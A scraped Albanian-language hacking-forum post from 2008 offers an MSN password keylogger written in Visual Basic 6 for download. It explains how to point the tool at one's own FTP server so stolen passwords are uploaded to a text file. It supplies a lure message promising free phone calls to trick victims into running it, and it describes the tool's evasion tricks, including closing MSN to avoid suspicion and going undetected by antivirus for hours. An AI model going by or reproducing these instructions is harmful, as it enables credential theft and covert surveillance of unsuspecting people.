http://www.bysantral.com/hacked.jpg Adelina - ((( Mitrovica & Kercova Hakers Grup )))) - Forum
Mo, 21-May-18, 5:36 PM
>> (( Mitrovica Hakers Grup )) <<
Welcome Antart | RSS
Main Adelina - ((( Mitrovica & Kercova Hakers Grup )))) - Forum Registration Login
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
((( Mitrovica & Kercova Hakers Grup )))) - Forum » Chat Programe » Msn messenger » Adelina (Keylogger per MSN qe i uplodon keylogun nepermjet FTP's)
Adelina
adelina_17Date: Sa, 06-September-08, 10:15 PM | Message # 1
Ushtar
Group: Princess
Messages: 23
Reputation: 8
Status: Offline
Keylogger per MSN qe i uplodon keylogun nepermjet FTP's
Ju vyn ni FTP dikun
Edhe modifikojeni Source codin ne VB6

Shkarko/Download

Nese din Visual Basic 6 ather vetem modifikoje inet control parametrat dhe masanej uplodoje programin ne te cilin e ki bashku me VB powerwrap ne FTP server.

Pasi e uplodon ne ftp server Viktimes filloji me i shit fore ne stilin
"Ej njeri a po don me fol pa pare me telefon downlodoje ket sen"

Perderisa viktima o ty provu me thir me telefon programi e qet prej MSN it mas 2 minutave qe mos me kon i dyshimt si shumica e keyloggerave tjere. Ne momentin qe ai/ajo e shkrun passin programi nuk e qet mo kerkon pej MSN po veq rin ty vjedh passa ne memorje edhe ty i uplodu ne fajllin dfinit.txt ne ftp serverin tend Ka ndodh qe norton worm protection e ka detektu por vetem pas 6 - 7 ore ose kure.

 
((( Mitrovica & Kercova Hakers Grup )))) - Forum » Chat Programe » Msn messenger » Adelina (Keylogger per MSN qe i uplodon keylogun nepermjet FTP's)
  • Page 1 of 1
  • 1
Search:

Copyright MyCorp © 2018